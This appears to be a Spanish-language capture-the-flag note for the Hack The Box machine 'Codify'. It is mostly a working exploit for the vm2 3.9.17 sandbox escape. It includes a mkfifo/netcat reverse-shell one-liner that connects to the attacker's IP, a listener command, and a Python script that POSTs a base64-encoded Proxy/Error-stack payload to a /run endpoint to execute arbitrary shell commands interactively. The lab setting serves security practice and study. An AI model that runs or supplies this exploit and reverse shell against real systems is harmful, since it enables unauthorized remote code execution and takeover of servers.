VM2 3.9.17
- Este script se usó para escapar del sandbox vm2@3.9.17 en la máquina Codify de HTB. Podemos llegar a inyectar comandos “RCE” y entablar una revshell. Más info en este PoC
- Ejecutar Revshell con mkfifo:
- Shell RCE $>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc [tuIP] [PortListener] >/tmp/f
- KALI $>
sudo nc -nlvp [PortListener]
- Shell RCE $>
#!/bin/python3
import requests
import base64
import json
# Target endpoint of the lab's code-runner and the headers every request
# carries; the body is always JSON (see send_request below).
url = "http://codify.htb:3000/run"
headers = dict([("Content-Type", "application/json")])
def send_request(command):
    """Send *command* to the target's ``/run`` endpoint wrapped in the vm2 payload.

    Args:
        command: shell command string. It is interpolated unescaped into the
            ``execSync("...")`` literal below, and the surrounding source is
            itself a JS template literal, so the generated JavaScript is only
            well-formed for plain command strings.

    Returns:
        The raw ``requests.Response``; the caller is responsible for parsing
        the JSON body.
    """
    # JavaScript source that the /run endpoint evaluates inside vm2.
    raw_code = (
        'const { VM } = require("vm2");\n'
        'const vm = new VM();\n\n'
        'const code = `\n'
        ' const err = new Error();\n'
        ' err.name = {\n'
        ' toString: new Proxy(() => "", {\n'
        ' apply(target, thiz, args) {\n'
        # The f-prefix on this line has no placeholder; kept as in the original.
        f' const process = args.constructor.constructor("return process")();\n'
        # The only line where *command* is substituted into the payload.
        f' throw process.mainModule.require("child_process").execSync("{command}").toString();\n'
        ' },\n'
        ' }),\n'
        ' };\n'
        ' try {\n'
        ' err.stack;\n'
        ' } catch (stdout) {\n'
        ' stdout;\n'
        ' }\n'
        '`;\n\n'
        'console.log(vm.run(code)); // RCE'
    )
    # The endpoint apparently expects the source base64-encoded in the JSON
    # field "code" (inferred from this request shape; verify against the app).
    # From a defender's side, a base64 "code" field in a JSON POST body is the
    # request shape to inspect when reviewing traffic to this endpoint.
    encoded_code = base64.b64encode(raw_code.encode()).decode()
    payload = json.dumps({"code": encoded_code})
    response = requests.post(url, headers=headers, data=payload)
    return response
def _repl_step():
    """Prompt once, send the typed command and print its output.

    Returns False when the user types "exit" (case-insensitive), True
    otherwise. Any exception other than KeyboardInterrupt propagates to the
    caller, matching the original loop's behaviour.
    """
    typed = input("$> ")
    if typed.lower() == "exit":
        return False
    # The endpoint answers with JSON; only the "output" field is shown.
    body = send_request(typed).json()
    print(body.get('output', '').strip())
    return True


print("Shell, introduce un comando")
# Interactive loop: runs until "exit" is typed or Ctrl-C is pressed anywhere
# inside a step (prompt, request or response parsing).
while True:
    try:
        if not _repl_step():
            break
    except KeyboardInterrupt:
        print("\033[91m[*] Saliendo...\033[0m")
        break